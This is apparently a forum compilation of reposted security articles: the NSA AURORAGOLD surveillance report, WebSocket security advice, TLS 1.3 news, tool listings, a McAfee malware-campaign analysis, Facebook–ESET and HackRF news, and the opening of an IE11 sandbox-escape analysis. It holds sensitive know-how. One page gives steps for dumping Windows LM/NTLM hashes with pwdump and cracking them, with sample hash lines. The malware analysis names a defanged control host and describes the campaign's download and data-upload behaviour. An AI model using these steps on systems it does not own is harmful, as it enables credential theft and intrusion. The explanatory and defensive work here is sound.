government to develop privacy-enhancing technologies. Karsten Nohl, a leading cellphone security expert and cryptographer who was consulted by The Intercept about details contained in the AURORAGOLD documents, said that the broad scope of information swept up in the operation appears aimed at ensuring virtually every cellphone network in the world is NSA accessible. “Collecting an inventory [like this] on world networks has big ramifications,” Nohl said, because it allows the NSA to track and circumvent upgrades in encryption technology used by cellphone companies to shield calls and texts from eavesdropping. Evidence that the agency has deliberately plotted to weaken the security of communication infrastructure, he added, was particularly alarming. “Even if you love the NSA and you say you have nothing to hide, you should be against a policy that introduces security vulnerabilities,” Nohl said, “because once NSA introduces a weakness, a vulnerability, it’s not only the NSA that can exploit it.” NSA spokeswoman Vanee’ Vines told The Intercept in a statement that the agency “works to identify and report on the communications of valid foreign targets” to anticipate threats to the United States and its allies.
Vines said: “NSA collects only those communications that it is authorized by law to collect in response to valid foreign intelligence and counterintelligence requirements—regardless of the technical means used by foreign targets, or the means by which those targets attempt to hide their communications.” Network coverage The AURORAGOLD operation is carried out by specialist NSA surveillance units whose existence has not been publicly disclosed: the Wireless Portfolio Management Office, which defines and carries out the NSA’s strategy for exploiting wireless communications, and the Target Technology Trends Center, which monitors the development of new communication technology to ensure that the NSA isn’t blindsided by innovations that could evade its surveillance reach. The center’s logo is a picture of the Earth overshadowed by a large telescope; its motto is “Predict – Plan – Prevent.” The NSA documents reveal that, as of May 2012, the agency had collected technical information on about 70 percent of cellphone networks worldwide—701 of an estimated 985—and was maintaining a list of 1,201 email “selectors” used to intercept internal company details from employees. (“Selector” is an agency term for a unique identifier like an email address or phone number.) From November 2011 to April 2012, between 363 and 1,354 selectors were “tasked” by the NSA for surveillance each month as part of AURORAGOLD, according to the documents. The secret operation appears to have been active since at least 2010. The information collected from the companies is passed on to NSA “signals development” teams that focus on infiltrating communication networks. It is also shared with other U.S. Intelligence Community agencies and with the NSA’s counterparts in countries that are part of the so-called “Five Eyes” surveillance alliance—the United Kingdom, Canada, Australia, and New Zealand.
Aside from mentions of a handful of operators in Libya, China, and Iran, names of the targeted companies are not disclosed in the NSA’s documents. However, a top-secret world map featured in a June 2012 presentation on AURORAGOLD suggests that the NSA has some degree of “network coverage” in almost all countries on every continent, including in the United States and in closely allied countries such as the United Kingdom, Australia, New Zealand, Germany, and France. One of the prime targets monitored under the AURORAGOLD program is the London-headquartered trade group, the GSM Association, or the GSMA, which represents the interests of more than 800 major cellphone, software, and internet companies from 220 countries. The GSMA’s members include U.S.-based companies such as Verizon, AT&T, Sprint, Microsoft, Facebook, Intel, Cisco, and Oracle, as well as large international firms including Sony, Nokia, Samsung, Ericsson, and Vodafone. The trade organization brings together its members for regular meetings at which new technologies and policies are discussed among various “working groups.” The Snowden files reveal that the NSA specifically targeted the GSMA’s working groups for surveillance. Claire Cranton, a spokeswoman for the GSMA, said that the group would not respond to details uncovered by The Intercept until its lawyers had studied the documents related to the spying. “If there is something there that is illegal then they will take it up with the police,” Cranton said. By covertly monitoring GSMA working groups in a bid to identify and exploit security vulnerabilities, the NSA has placed itself into direct conflict with the mission of the National Institute for Standards and Technology, or NIST, the U.S. government agency responsible for recommending cybersecurity standards in the United States. 
NIST recently handed out a grant of more than $800,000 to GSMA so that the organization could research ways to address “security and privacy challenges” faced by users of mobile devices. The revelation that the trade group has been targeted for surveillance may reignite deep-seated tensions between NIST and NSA that came to the fore following earlier Snowden disclosures. Last year, NIST was forced to urge people not to use an encryption standard it had previously approved after it emerged NSA had apparently covertly worked to deliberately weaken it. Jennifer Huergo, a NIST spokeswoman, told The Intercept that the agency was “not aware of any activities by NSA related to the GSMA.” Huergo said that NIST would continue to work towards “bringing industry together with privacy and consumer advocates to jointly create a robust marketplace of more secure, easy-to-use, privacy-enhancing solutions.” GSMA headquarters in London Encryption attack The NSA focuses on intercepting obscure but important technical documents circulated among the GSMA’s members known as “IR.21s.” Most cellphone network operators share IR.21 documents among each other as part of agreements that allow their customers to connect to foreign networks when they are “roaming” overseas on a vacation or a business trip. An IR.21, according to the NSA documents, contains information “necessary for targeting and exploitation.” The details in the IR.21s serve as a “warning mechanism” that flags new technology used by network operators, the NSA’s documents state. This allows the agency to identify security vulnerabilities in the latest communication systems that can be exploited, and helps efforts to introduce new vulnerabilities “where they do not yet exist.” The IR.21s also contain details about the encryption used by cellphone companies to protect the privacy of their customers’ communications as they are transmitted across networks.
These details are highly sought after by the NSA, as they can aid its efforts to crack the encryption and eavesdrop on conversations. Last year, the Washington Post reported that the NSA had already managed to break the most commonly used cellphone encryption algorithm in the world, known as A5/1. But the information collected under AURORAGOLD allows the agency to focus on circumventing newer and stronger versions of A5 cellphone encryption, such as A5/3. The documents note that the agency intercepts information from cellphone operators about “the type of A5 cipher algorithm version” they use, and monitors the development of new algorithms in order to find ways to bypass the encryption. In 2009, the British surveillance agency Government Communications Headquarters conducted a similar effort to subvert phone encryption under a project called OPULENT PUP, using powerful computers to perform a “crypt attack” to penetrate the A5/3 algorithm, secret memos reveal. By 2011, GCHQ was collaborating with the NSA on another operation, called WOLFRAMITE, to attack A5/3 encryption. (GCHQ declined to comment for this story, other than to say that it operates within legal parameters.) The extensive attempts to attack cellphone encryption have been replicated across the Five Eyes surveillance alliance. Australia’s top spy agency, for instance, infiltrated an Indonesian cellphone company and stole nearly 1.8 million encryption keys used to protect communications, the New York Times reported in February. The NSA’s documents show that it focuses on collecting details about virtually all technical standards used by cellphone operators, and the agency’s efforts to stay ahead of the technology curve occasionally yield significant results.
In early 2010, for instance, its operatives had already found ways to penetrate a variant of the newest “fourth generation” smartphone-era technology for surveillance, years before it became widely adopted by millions of people in dozens of countries. The NSA says that its efforts are targeted at terrorists, weapons proliferators, and other foreign targets, not “ordinary people.” But the methods used by the agency and its partners to gain access to cellphone communications risk significant blowback. According to Mikko Hypponen, a security expert at Finland-based F-Secure, criminal hackers and foreign government adversaries could be among the inadvertent beneficiaries of any security vulnerabilities or encryption weaknesses inserted by the NSA into communication systems using data collected by the AURORAGOLD project. “If there are vulnerabilities on those systems known to the NSA that are not being patched on purpose, it’s quite likely they are being misused by completely other kinds of attackers,” said Hypponen. 
“When they start to introduce new vulnerabilities, it affects everybody who uses that technology; it makes all of us less secure.” In December, a surveillance review panel convened by President Obama concluded that the NSA should not “in any way subvert, undermine, weaken, or make vulnerable generally available commercial software.” The panel also recommended that the NSA should notify companies if it discovers previously unknown security vulnerabilities in their software or systems—known as “zero days” because developers have been given zero days to fix them—except in rare cases involving “high priority intelligence collection.” In April, White House officials confirmed that Obama had ordered NSA to disclose vulnerabilities it finds, though qualified that with a loophole allowing the flaws to be secretly exploited so long as there is deemed to be “a clear national security or law enforcement” use. Vines, the NSA spokeswoman, told The Intercept that the agency was committed to ensuring an “open, interoperable, and secure global internet.” “NSA deeply values these principles and takes great care to honor them in the performance of its lawful foreign-intelligence mission,” Vines said. She declined to discuss the tactics used as part of AURORAGOLD, or comment on whether the operation remains active. ——— Documents published with this article: AURORAGOLD – Project Overview AURORAGOLD Working Group IR.21 – A Technology Warning Mechanism AURORAGOLD – Target Technology Trends Center support to WPMO NSA First-Ever Collect of High-Interest 4G Cellular Signal AURORAGOLD Working Aid WOLFRAMITE Encryption Attack OPULENT PUP Encryption Attack NSA/GCHQ/CSEC Network Tradecraft Advancement Team ——— Photo: Cell tower: Justin Sullivan/Getty Images; GSMA headquarters: Google Maps Sursa: https://firstlook.org/theintercept/2014/12/04/nsa-auroragold-hack-cellphones/
-
WebSocket Security Issues Overview In this article, we will dive into the concept of WebSocket introduced in HTML5, the security issues around the WebSocket model, and the best practices that should be adopted to address them. Before going straight to security, let’s refresh our concepts on WebSocket. Why WebSocket and Not HTTP? In the early days, the client-server model was built around the client requesting a resource from the server. The Web was built for this kind of model, and HTTP was sufficient to handle these requests. However, with advances in technology, the needs of online gaming and real-time applications created the need for a protocol that could provide a bidirectional connection between client and server to allow live streaming. Web applications have grown up a lot, and are now consuming more data than ever before. The biggest thing holding them back was the traditional HTTP model of client-initiated transactions. To overcome this, a number of different strategies were devised to allow servers to push data to the client. One of the most popular of these strategies was long-polling, which involves keeping an HTTP connection open until the server has some data to push down to the client. The problem with all of these solutions is that they carry the overhead of HTTP: every time you make an HTTP request, a bunch of headers and cookie data are transferred to the server. Modifying HTTP itself to create a bidirectional channel between client and server was considered, but that model could not be sustained because of the HTTP overhead, and it would certainly introduce latency. In real-time applications, especially gaming applications, latency cannot be afforded. Because of this shortcoming of HTTP, a new protocol known as WebSocket, which runs over the same TCP/IP model, was designed. How WebSockets Work WebSockets provide a persistent connection between client and server that both parties can use to send data at any time.
The connection is initiated by the client through a WebSocket handshake. This happens over a normal HTTP request with an “Upgrade” header. A sample connection is shown below: If the server supports WebSocket connections, it responds with an “Upgrade” header in the response. A sample is below: After this exchange of request and response messages, a persistent WebSocket connection is established between the client and the server. WebSockets can transfer as much data as you like without incurring the overhead associated with traditional HTTP requests. Data is transferred through a WebSocket as messages, each of which consists of one or more frames containing the data being sent (the payload). To ensure the message can be properly reconstructed when it reaches the client, each frame is prefixed with 4-12 bytes of data about the payload. Using this frame-based messaging system helps to reduce the amount of non-payload data that is transferred, leading to significant reductions in latency. Note: the “Upgrade” header tells the server that the client wants to initiate a WebSocket connection. WebSocket Security Issues WebSocket has some inherent security issues. Some of them are listed below: Open to DoS attacks: WebSocket allows an unlimited number of connections to the target server, so server resources can be exhausted by a denial-of-service attack. The WebSocket protocol does not provide any particular way for a server to authenticate clients during the handshake process; WebSocket can only carry forward the mechanisms available to normal HTTP connections, such as cookies, HTTP authentication or TLS client authentication. During the upgrade handshake from HTTP to WebSocket (WS), the browser sends all of this ambient authentication information along to the WS endpoint, which enables the attack termed Cross Site WebSocket Hijacking (CSWSH).
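The Upgrade handshake described above can be sketched in a few lines. The server proves it understood the request by SHA-1-hashing the client's Sec-WebSocket-Key concatenated with a fixed GUID (defined in RFC 6455) and returning the base64 result as Sec-WebSocket-Accept. A minimal sketch, using the sample key from the RFC:

```python
import base64
import hashlib

# Fixed GUID from RFC 6455, appended to the client's key
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

def accept_value(sec_websocket_key: str) -> str:
    """Compute the Sec-WebSocket-Accept header a server must return."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")

# Client side of the handshake (sample key taken from RFC 6455)
key = "dGhlIHNhbXBsZSBub25jZQ=="
request = (
    "GET /chat HTTP/1.1\r\n"
    "Host: server.example.com\r\n"
    "Upgrade: websocket\r\n"          # asks the server to switch protocols
    "Connection: Upgrade\r\n"
    f"Sec-WebSocket-Key: {key}\r\n"
    "Sec-WebSocket-Version: 13\r\n\r\n"
)

# A conforming server answers "101 Switching Protocols" carrying this value:
print(accept_value(key))  # s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
```

Note that this accept computation only proves protocol agreement; it provides no client authentication at all, which is exactly the gap the CSWSH discussion above is about.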
WebSockets can be used over unencrypted TCP channels, which can lead to major flaws such as those listed in OWASP Top 10 A6-Sensitive Data Exposure. WebSockets are vulnerable to malicious input data attacks, leading to attacks like Cross Site Scripting (XSS). The WebSocket protocol implements data masking, which is present to prevent proxy cache poisoning. But it has a dark side: masking inhibits security tools from identifying patterns in the traffic. Products such as Data Loss Prevention (DLP) software and firewalls are typically not aware of WebSockets, so they can’t do data analysis on WebSocket traffic, and therefore can’t identify malware, malicious JavaScript and data leakage in WebSocket traffic. The WebSocket protocol doesn’t handle authorization and/or authentication; application-level protocols should handle that separately in case sensitive data is being transferred. It’s relatively easy to tunnel arbitrary TCP services through a WebSocket, for example, to tunnel a database connection directly through to the browser. This is high risk, as it would expose those services to an in-browser attacker in the case of a Cross Site Scripting attack, allowing an XSS attack to escalate into a complete remote breach. Recommendations Around WebSocket Security Flaws Below are the recommendations / best practices for the security flaws listed above: The WebSocket standard defines an Origin header field which Web browsers set to the URL that originates a WebSocket request. This can be used to differentiate between WebSocket connections from different hosts, or between those made from a browser and some other kind of network client. However, the Origin header is essentially advisory: non-browser clients can easily set the Origin header to any value, and thus “pretend” to be a browser. Origin headers are roughly analogous to the X-Requested-With header used by AJAX requests.
Web browsers send a header of X-Requested-With: XMLHttpRequest which can be used to distinguish between AJAX requests made by a browser and those made directly. However, this header is easily set by non-browser clients, and thus isn’t trusted as a source of authentication. Use per-session random tokens (like CSRF tokens) on the handshake request and verify them on the server. WebSockets must be configured to use a secure (TLS-encrypted) channel; a URI with the wss:// scheme indicates a secure WebSocket connection. Any data from untrusted sources must not be trusted. All input must be sanitized before it enters the execution context, and you should apply equal suspicion to data returned from the server as well. Always process messages received on the client side as data: don’t try to assign them directly to the DOM, nor evaluate them as code. If the response is JSON, always use JSON.parse() to safely parse the data. Avoid tunneling if at all possible, instead developing more secure, validated protocols on top of WebSockets. References https://devcenter.heroku.com/articles/websocket-security An Introduction to WebSockets | Treehouse Blog By Lohit Mehta|December 4th, 2014 Sursa: WebSocket Security Issues - InfoSec Institute
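The first two recommendations above, checking the (advisory) Origin header against a whitelist and verifying a per-session random token, can be sketched server-side as follows. The headers are modeled as a plain dict, and the origin list and the X-WS-Token header name are illustrative assumptions, not part of any standard:

```python
import hmac
import secrets

ALLOWED_ORIGINS = {"https://app.example.com"}  # illustrative whitelist

def issue_handshake_token() -> str:
    """Generate a CSRF-style random token to embed in the page and
    echo back on the WebSocket handshake request."""
    return secrets.token_urlsafe(32)

def handshake_allowed(headers: dict, expected_token: str) -> bool:
    """Reject handshakes from unexpected origins or without the session
    token. Origin alone is advisory (non-browser clients can forge it),
    so the unguessable token is what actually defeats CSWSH."""
    if headers.get("Origin") not in ALLOWED_ORIGINS:
        return False
    supplied = headers.get("X-WS-Token", "")  # hypothetical header name
    return hmac.compare_digest(supplied, expected_token)

token = issue_handshake_token()
good = {"Origin": "https://app.example.com", "X-WS-Token": token}
evil = {"Origin": "https://attacker.example", "X-WS-Token": token}

assert handshake_allowed(good, token)
assert not handshake_allowed(evil, token)
```

hmac.compare_digest is used for the token comparison so that the check runs in constant time and doesn't leak the token byte-by-byte through timing.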
-
New TLS/SSL Version Ready In 2015 Kelly Jackson Higgins One of the first steps in making encryption the norm across the Net is an update to the protocol itself and a set of best practices for using encryption in applications. The Internet's standards body next year will release the newest version of the Transport Layer Security (TLS) protocol, which, among other things, aims to reduce the chance of implementation errors that have plagued the encryption space over the past year. The more streamlined Version 1.3 of TLS (TLS is the newest generation of its better-known predecessor, SSL) trims out unnecessary features and functions that ultimately could lead to buggy code. The goal is a streamlined yet strong encryption protocol that's easier to implement and less likely to leave the door open to implementation flaws. "Having options in there that are a smoking gun and one developer gets wrong… could lead to a huge security problem," Russ Housley, chair of the Internet Architecture Board (IAB), says of the problem that TLS 1.3 aims to solve. That's the kind of scenario that led to the Heartbleed bug in the OpenSSL implementation of the encryption protocol. Heartbleed came out of an error in OpenSSL's deployment of the "heartbeat" extension in TLS. The bug, if exploited, could allow an attacker to leak the contents of the memory from the server to the client and vice versa. That could leave passwords and even the SSL server's private key potentially exposed in an attack. [The era of encrypted communications may have finally arrived. Internet Architecture Board chairman Russ Housley explains what the IAB's game-changing statement about encryption means for the future of the Net: Q&A: Internet Encryption As The New Normal.]
The IETF's Using TLS in Applications (UTA) working group will offer best-practices for using TLS in applications, as well as guidance on how certain applications should use the encryption protocol, which also will promote interoperability among encrypted systems. Pete Resnick, the IETF's applications area director, says among the best-practices are the use of the latest crypto algorithms and avoiding the use of weak (or no) encryption, as well as eliminating the use of older TLS/SSL versions. "This will end up making things more secure in the long run by providing common guidelines across implementations," he says. UTA also is working on guidance for using TLS with the instant messaging protocol XMPP (a.k.a. Jabber) and also using TLS with email client protocols POP, IMAP, and SMTP Submission. The goal is to make encryption more interoperable among messaging servers to help propel the use of encrypted communications, according to Resnick. Kelly Jackson Higgins is Executive Editor at DarkReading.com... Sursa: New TLS/SSL Version Ready In 2015
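One of the UTA best practices mentioned above, eliminating older TLS/SSL versions, is something applications can already enforce today. A minimal sketch with Python's standard ssl module (the TLS 1.2 floor chosen here is illustrative, not an IETF requirement):

```python
import ssl

# Build a client context with sane defaults (certificate and hostname
# verification enabled), then refuse anything older than TLS 1.2 so
# legacy SSLv3 / TLS 1.0 / TLS 1.1 peers are rejected outright.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2

# Old protocol versions are now outside the negotiable range.
assert context.minimum_version == ssl.TLSVersion.TLSv1_2
```

Raising the floor in the context, rather than hand-rolling version checks per connection, is exactly the kind of "one safe default across implementations" that the UTA guidance is driving at.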
-
[TABLE=align: left] [TR] [TD][TABLE=width: 100%] [TR] [TD]Windows Password Kracker is a free software to recover the lost or forgotten Windows password. It can quickly recover the original windows password from either LM (LAN Manager) or NTLM (NT LAN Manager) Hash.[/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Windows encrypts the login password using LM or NTLM hash algorithm. Since these are one way hash algorithms we cannot directly decrypt the hash to get back the original password. In such cases 'Windows Password Kracker' can help in recovering the windows password using the simple dictionary crack method. Before that you need to dump the password hashes from live or remote windows system using pwdump tool (more details below). Then feed the hash (LM/NTLM) for the corresponding user into 'Windows Password Kracker' to recover the password for that user. In forensic scenarios, investigator can dump the hashes from the live/offline system and then crack it using 'Windows Password Kracker' to recover the original password. This is very crucial as such a password can then be used to decrypt stored credentials as well as encrypted volumes on that system. 'Windows Password Kracker' uses simple & quicker Dictionary based password recovery technique. By default it comes with sample password file. However you can find good collection of password dictionaries (also called wordlist) here & here. Though it supports only Dictionary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'Windows Password Kracker'. It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Features[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Free tool to quickly recover the Windows login password. Supports Windows password recovery from both LM & NTLM Hash. 
Uses simple dictionary crack method. Displays detailed statistics during Cracking operation Stop the password cracking operation any time. Very easy to use with cool GUI interface. Generate Windows Password Recovery report in HTML/XML/TEXT format. Includes Installer for local Installation & Uninstallation. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Installation & Un-installation[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Windows Password Kracker comes with Installer to help in local installation & un-installation. This installer has intuitive wizard which guides you through series of steps in completion of installation.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]At any point of time, you can uninstall the product using the Uninstaller located at following location (by default)[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_code][Windows 32 bit] C:\Program Files\SecurityXploded\WindowsPasswordKracker [Windows 64 bit] C:\Program Files (x86)\SecurityXploded\WindowsPasswordKracker[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] How to Dump LM/NTLM Hash & Crack it?[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] 'Windows Password Kracker' is very easy to use tool for any generation of users. Here are simple steps[/TD] [/TR] [TR] [TD] Install 'Windows Password Kracker' on any system (preferably faster high end systems). Use pwdump tool ( ) to recover the password hashes from live or offline windows system. 
Sample output will be as shown below [/TD] [/TR] [TR] [TD=class: page_code] Administrator:500:D702A1D01B6BC2418112333D93DFBB4C:C8DBB1CFF1970C9E3EC44EBE2BA7CCBC::: ASPNET:1001:359E64F7361B678C283B72844ABF5707:49B784EF1E7AE06953E7A4D37A3E9529::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: Test:1002:D702A1D01B6BC2418112333D93DFBB4C:C8DBB1CFF1970C9E3EC44EBE2BA7CCBC:::[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Each dumped user account is in following format[/TD] [/TR] [TR] [TD=class: page_code] Username : User ID : LM hash : NTLM Hash :::[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]On newer operating systems (such as vista, win7 etc) LM hash will be absent as it is disabled by default.[/TD] [/TR] [TR] [TD] Once you get the password hash, you can copy either LM (preferred) or NTLM hash onto 'Windows Password Kracker'. Then select the type of hash as LM or NTLM from the drop down box. Next select the password dictionary file by clicking on Browse button or simply drag & drop it. You can find a sample dictionary file in the installed location. Finally click on 'Start Crack' to start the Windows Password recovery. During the operation, you will see all statistics being displayed on the screen. Message box will be displayed on success. At the end, you can generate detailed report in HTML/XML/Text format by clicking on 'Report' button and then select the type of file from the drop down box of 'Save File Dialog'. 
Screenshots

Screenshot 1: Windows Password Kracker showing the recovered password from an NTLM hash.

Screenshot 2: Detailed Windows password recovery report generated by Windows Password Kracker.

Test Results

Windows Password Kracker has been successfully tested from Windows XP up to the latest operating system, Windows 8. It can successfully recover passwords for both LM and NTLM hash values.

Disclaimer

'Windows Password Kracker' is designed with the good intention of recovering lost Windows passwords. Like any other tool, whether its use is good or bad depends upon the user who uses it. However, neither the author nor SecurityXploded is in any way responsible for damages or impact caused by misuse of Windows Password Kracker. Read our complete 'License & Disclaimer' policy here.

Release History

Version 2.6: 3rd Dec 2014
Removed false positives with various antivirus solutions.

Version 2.5: 31st Mar 2014
Improved GUI interface with magnifying icon effects and about dialog changes.

Version 2.0: 21st Feb 2013
Quick help link on dumping the LM/NTLM hash from a system and cracking it. Fix for a screen refresh problem and a few UI improvements.

Version 1.5: 28th Oct 2012
Added support to automatically remember and restore user settings.

Version 1.0: 3rd Aug 2012
First public release of Windows Password Kracker.

Download

FREE Download Windows Password Kracker v2.6
License: Freeware
Platform: Windows XP, 2003, Vista, Windows 7, Windows 8

Sursa: Windows Password Kracker : Free Windows Password Recovery Software.
-
[h=2].: XNTSV:. [/h] XNTSV is a utility that displays detailed information about Windows system structures. Download XNTSV (32-bit) ver. 1.8 (OS Windows) Download XNTSV (64-bit) ver. 1.8 (OS Windows) XNTSV is absolutely free for commercial and non-commercial use. Sursa: .:NTInfo:.
-
[h=2].: PDBRipper:. [/h] PDBRipper is a utility for extracting information from PDB files. PDBRipper can extract: Enumerations User-defined types (structures, unions ...) Type defines Download PDBRipper ver. 1.12 (OS Windows) PDBRipper is absolutely free for commercial and non-commercial use. Sursa: .:NTInfo:.
-
.: Detect It Easy:. Detect It Easy is a packer identifier. Download DIE ver. 0.93 (Mac OS X) Download DIE ver. 0.93 (Windows) Download DIE ver. 0.93 (Linux Ubuntu 32-bit (x86)) Download DIE ver. 0.93 (Linux Ubuntu 64-bit (x64)) For other Linux distributions you can try to compile DIE from the sources. Download DIE DLL (Windows) Download DieSort (Windows) Plugin for HIEW (author exet0l) more info Plugin for CFF Explorer (32 bits only!) (author exet0l) more info GITHUB signatures GITHUB engine Executable Image Viewer (this program uses the DIE DLL) more info (EN, PL) Detect It Easy is absolutely free for commercial and non-commercial use. Sursa: .:NTInfo:.
-
Behavior Analysis Stops Romanian Data-Stealing Campaign By Ankit Anubhav, Christiaan Beek on Dec 03, 2014 In a recent press announcement, McAfee and Europol's European Cybercrime Centre announced a cooperation of our talents to fight cybercrime. In general these joint operations are related to large malware families. Writing or spreading malware, even in small campaigns, is a crime. McAfee Labs doesn't hesitate to reach out to its partners and contacts in CERTs and law enforcement. In the following case, a new Romania-based data-stealing campaign was caught early thanks to behavioral and data analytics. In our sample behavioral database, we found a new site hxxp://virus-generator.hi2.ro. Visiting the link revealed an open directory that allowed us to browse the content: Often we observe that malware authors become overzealous in attacking victims, and forget to protect their own malware servers. Despite this campaign's effectiveness, the malware authors took very little care to ensure that they themselves were not breached. The binaries that help us understand how this campaign works are injector.exe and blurmotion.exe. As the name suggests, injector.exe compromises the victim's system via code injection into Internet Explorer. It first disables the firewall to ensure a smooth connection to the malware control server. With the help of the mget command, the malware connects to the control site and downloads the payload blurmotion.exe. The fact that the malware site doesn't use any authentication makes sense because it allows a swift connection between the victim and the attacker. Once the payload is downloaded, the script root.vbs takes over. This VBScript is dropped by injector.exe and ensures that blurmotion.exe is executed. We see the use of wscript.sleep 30000, which pauses execution for 30 seconds. This could be an attempt to deceive malware analyzers into thinking that the sample won't do anything. The necessary Run registry entries make sure root.vbs runs.
After that a misspelled "restartt" is forced. After this step, the system goes into a forced restart, and by this time the work of injector.exe (downloading and installing the payload) is done. From here the payload takes over. Blurmotion.exe, like its parent, drops a batch file to perform malicious activities. Blurmotion takes the username of the victim and dumps all the processes running on the victim's system into a file named %usename%.ini. Once the stolen data is logged, the malware uploads it to the control server via the mput command. We can see "echo cd BM" used in the commands. This is the same BM folder on the malware control server that stores the logs of all victims. Like the payload, this stolen data is exposed to anyone who finds the malware control server. Our test virtual machine "victim" was named Klone, and we found it quickly uploaded to the control server. The size of Klone.ini is zero because we had reverted the virtual machine before the malware could steal data. In all the other infected user logs, we can see the malware executable blurmotion.exe running, confirming that those systems had been compromised. We can also see repeated connections made to a specific site (mygarage.ro), possibly an attempt to increase its traffic. The author is so aggressive that he or she even tried to overclock the CPU to bring more traffic to this site. The author succeeded in these attempts. In our internal behavioral database we found a lot of redirects to this site. McAfee detects these payloads as Rodast. McAfee SiteAdvisor also warns against connecting to this site: Because the campaign was based in Romania, McAfee Labs contacted the Romanian CERT. After we discussed the approach and strategy with them, the Romanian team took the appropriate actions, and gave us permission to publish our analysis of the campaign in this article. Malware authors sometimes act carelessly, and assume that they are safe if no one detects them.
But data from behavioral analysis, along with cooperation with CERTs and law enforcement, can find live campaigns and stop them. Sursa: Behavior Analysis Stops Romanian Data-Stealing Campaign | McAfee
-
[h=2]Facebook Partners With ESET to Fight Malware[/h]By Brian Prince on December 03, 2014 Facebook is teaming with security vendor ESET to improve defenses against malware. The move follows a partnership Facebook announced in May involving F-Secure and Trend Micro. "[F-Secure and Trend Micro] built free versions of their products directly into Facebook so that people could get the help they need without additional hassle," blogged Chetan Gowda, a software engineer on the Site Integrity team at Facebook. "Today, we are expanding those capabilities by adding the anti-malware technology of another IT security vendor, ESET," he wrote. "A larger number of providers increases the chances that malware will get caught and cleaned up, which will help people on Facebook keep their information more secure." According to Facebook, if the device a user is using to access its services is behaving suspiciously and shows signs of a possible malware infection, a message will appear offering the user an anti-malware scan for their device. The user can run the scan, see the results and disable the software without logging out of Facebook. "Glancing through headlines in recent months reveals that malware continues to be a persistent problem for governments, companies, and individuals," Gowda noted. "With the potential to remain undetected on devices for months, malicious code can collect personal information and even spread to other computers in some cases. Compounding the challenges for defense, most people lack basic anti-malware programs that could protect their devices or clean up infections more quickly. "We've worked with ESET to incorporate their finely tuned security software directly into our existing abuse detection and prevention systems, similarly to what we did earlier this year with the other providers," Gowda continued. 
"Together, these three systems will help us block malicious links and harmful sites from populating the News Feeds and Messages of the 1.35 billion people who use Facebook." Sursa: Facebook Partners With ESET to Fight Malware | SecurityWeek.Com
-
HackRF Blue: A Lower Cost HackRF Earlier in the year the HackRF One was released by Michael Ossmann. It is a transmit- and receive-capable software defined radio with a 10 MHz to 6 GHz range which currently sells for around $300 USD. Since the HackRF is open source hardware, anyone can make changes to the design and build and sell their own version. The HackRF Blue is a HackRF clone that aims to sell at a lower cost. By sourcing lower cost parts that still work well in the HackRF circuit, the team behind the HackRF Blue was able to reduce the price of the HackRF down to $200 USD. They claim that the HackRF Blue has the same performance as the HackRF One and is fully compatible with the HackRF software. They are currently seeking funding through an IndieGoGo campaign. Their main goal through the funding is to help provide underprivileged hackerspaces with a free HackRF. The HackRF Blue https://www.youtube.com/watch?feature=player_embedded&v=giSax3XBbJ4 Sursa: HackRF Blue: A Lower Cost HackRF - rtl-sdr.com
-
Escaping the Internet Explorer Sandbox: Analyzing CVE-2014-6349 8:00 pm (UTC-7) | by Jack Tang (Threats Analyst) Applications that are frequently targeted by exploits often add sandboxes to their features in order to harden their defenses against these attacks. To carry out a successful exploit, an attacker has to breach these sandboxes to run malicious code. As a result, researchers pay particular attention to exploits that are able to escape sandboxes. In both the October and November Patch Tuesday cycles, Microsoft addressed several vulnerabilities that were used by attackers to escape the Internet Explorer sandbox. One of these was CVE-2014-6349, which was addressed by Microsoft as part of MS14-065, November's cumulative Internet Explorer patch. We chose this particular vulnerability for two reasons: exploiting it is relatively easy, and its methodology – using shared memory to escape the Internet Explorer sandbox – has not been seen before. A separate vulnerability that also allowed for sandbox escapes – CVE-2014-6350 – was also fixed in the same patch, and Google released details about this second vulnerability earlier this week. Internet Explorer 11 exposes a shared memory section object to all tab processes (which are sandboxed). This is used to store various Internet Explorer settings. Normally, the tab processes only read this to see these settings. However, in Enhanced Protected Mode (EPM, which is IE's sandbox mode), the shared memory section's DACL (Discretionary Access Control List) is not configured correctly. The tab processes have "write" permission to modify the shared memory section's content. This can be used by an attacker to break the IE sandbox. How can this be done? We will explain this in the rest of this post. To understand the concepts covered in this post, background knowledge about Protected Mode (PM) and EPM is necessary. These MSDN documents and HITB presentations provide background information on these topics.
